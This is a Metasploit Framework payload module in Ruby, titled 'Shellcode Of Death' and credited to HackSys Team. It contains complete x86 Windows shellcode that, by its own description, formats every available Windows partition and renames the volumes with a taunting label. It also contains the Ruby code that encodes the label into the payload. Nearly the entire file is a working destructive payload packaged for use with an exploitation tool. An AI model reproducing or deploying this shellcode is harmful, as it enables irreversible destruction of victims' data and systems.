###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
###
###
#	                 uuuuuuu
#	             uu$$$$$$$$$$$uu
#	          uu$$$$$$$$$$$$$$$$$uu
#	         u$$$$$$$$$$$$$$$$$$$$$u
#	        u$$$$$$$$$$$$$$$$$$$$$$$u
#	       u$$$$$$$$$$$$$$$$$$$$$$$$$u
#	       u$$$$$$$$$$$$$$$$$$$$$$$$$u
#	       u$$$$$$"   "$$$"   "$$$$$$u
#	       "$$$$"      u$u       $$$$"
#	        $$$u       u$u       u$$$
#	        $$$u      u$$$u      u$$$
#	         "$$$$uu$$$   $$$uu$$$$"
#	          "$$$$$$$"   "$$$$$$$"
#	            u$$$$$$$u$$$$$$$u
#	             u$"$"$"$"$"$"$u
#	  uuu        $$u$ $ $ $ $u$$       uuu
#	 u$$$$        $$$$$u$u$u$$$       u$$$$
#	  $$$$$uu      "$$$$$$$$$"     uu$$$$$$
#	u$$$$$$$$$$$uu    """""    uuuu$$$$$$$$$$
#	$$$$"""$$$$$$$$$$uuu   uu$$$$$$$$$"""$$$"
#	 """      ""$$$$$$$$$$$uu ""$"""
#	           uuuu ""$$$$$$$$$$uuu
#	  u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
#	  $$$$$$$$$$""""           ""$$$$$$$$$$$"
#	   "$$$$$"    Shellcode Of      ""$$$$""
#	     $$$"        Death            $$$$"
#
#
#                     _     __             _____                     
#     /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
#    / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \ 
#   / __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
#   \/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
#                              |___/                                 
#
#                                http://hacksys.vfreaks.com/
#                                  hacksysteam@hotmail.com
#
#
#   Shellcode Of Death
#
#   Copyright (c) 2012-2013 HackSys Team - Panthera
#   All rights reserved.
#
###

require 'msf/core'

module Metasploit3

	include Msf::Payload::Windows
	include Msf::Payload::Single

	def initialize(info = {})
		super(update_info(info,
			'Name'          => 'Shellcode Of Death',
			'Description'   => %q{
				Formats all the available Windows partitions.

				Note: After formatting the volume, it renames 
				the volume label as set in the shellcode. If
				error occurs, it skips and proceeds to next volume. 
			},
			'Author'        => [ 'Ashfaq Ansari <ashfaq_ansari1989@hotmail.com>' ,
					     'Ruei-Min Jiang <@mike820324>' 
					   ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'Platform'      => 'win',
			'Arch'          => ARCH_X86,
			'Privileged'    => true,
			))

		# EXITFUNC is not supported
		deregister_options('EXITFUNC')

		# Register command execution options
		register_options(
			[
				OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD - HackSys Team" ])
			], self.class)
	end

	def generate

		volume_label		= datastore['VOLUMELABEL'] || ""
		encoded_volume_label	= ''
		temp_voulme_label	= volume_label
		
		temp_voulme_label.split("").each do |i|
  			encoded_volume_label	<< "#{i}" + "\x00"
		end

		magic_key		= 28 + (2*volume_label.length)

		payload_data = 	"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +
				"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +
				"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +
				"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +
				"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +
				"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" + 
				"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +
				"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +
				"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +
				"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +
				"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +
				"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +
				"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
				# You might need to adjust this. Logic: 28 + 2*len(volume_label)
				magic_key.chr + 				
				"\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +
				"\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +
				"\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +
				"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +
				"\x53\x00\x00\x00" +
				# Volume Label
				# Default: PwNeD - HackSys Team
				encoded_volume_label +
				# Volume Label End
				"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"

		the_payload = payload_data
	end

end